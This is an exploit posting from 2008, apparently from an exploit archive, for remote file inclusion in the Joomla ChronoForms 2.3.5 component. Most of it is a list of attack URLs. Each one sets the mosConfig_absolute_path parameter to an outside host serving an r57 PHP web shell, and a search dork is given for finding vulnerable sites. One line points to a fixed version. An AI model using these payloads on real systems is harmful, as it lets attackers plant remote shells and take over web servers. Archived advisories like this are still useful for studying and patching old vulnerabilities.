Joomla Component ChronoForms 2.3.5 RFI Vulnerabilities

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Joomla Component ChronoForms 2.3.5 RFI Vulnerabilities
# Published : 2008-01-30
# Author : Crackers_Child
# Previous Title : Coppermine Photo Gallery 1.4.14 Remote Command Execution Exploit
# Next Title : PHP Links <= 1.3 (vote.php id) Remote SQL Injection Vulnerability

+______________________________________________By Crackers_Child___________________________________________+

*
*
*    [~] Script.......:       CHRONOFORMS version V2.3.5
*    [~] Down.........:       http://www.joomlaos.de/option,com_remository/Itemid,41/func,startdown/id,2810.html
*    [~] Author.......:       Crackers_Child  | cybermilitan@hotmail.com & localexploit@hotmail.com
*    [~] Class........:       Remote File ?°nclude Vulnerability
*    [~] Dork.........:       inurl:/com_chronocontact
*    [~] ForFix.........:     For Fix Your Script Download http://www.chronoengine.com/component/option,com_docman/task,cat_view/gid,27/ 2.3.7 Version
+_______________________________________________________________________________________________________________________+


+_______________________________________________________________________________________________________________________+
*
*
*    
*
*       [~] Exploit Rfi...:http://[Taget]/[Path]//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.sibersavascilar.com/shelz/r57.txt?
*
*
*           /administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.sibersavascilar.com/shelz/r57.txt?
*
*           /administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://www.sibersavascilar.com/shelz/r57.txt?
*
*           /administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.sibersavascilar.com/shelz/r57.txt?
*
*           /administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://www.sibersavascilar.com/shelz/r57.txt?
*
*           /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.sibersavascilar.com/shelz/r57.txt?
*
*           /administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.sibersavascilar.com/shelz/r57.txt?
*                            
+_______________________________________________________________________________________________________________________+



        [~] ?°nfo......: Kac Kere ??lDunuz ki " Olum Den Korkmuyorum Ben " Diyebiliyorsunuz . . .
                     



+_______________________________________________________________________________________________________________________+

+_______________________________________________________________________________________________________________________+
*
*
*       [~] Special Thanx.......:    str0ke, SiberSavascilar.com , (Cyber-Crime) , BiyoFrm.Com
*
+_______________________________________________________________________________________________________________________+

# www.Syue.com [2008-01-30]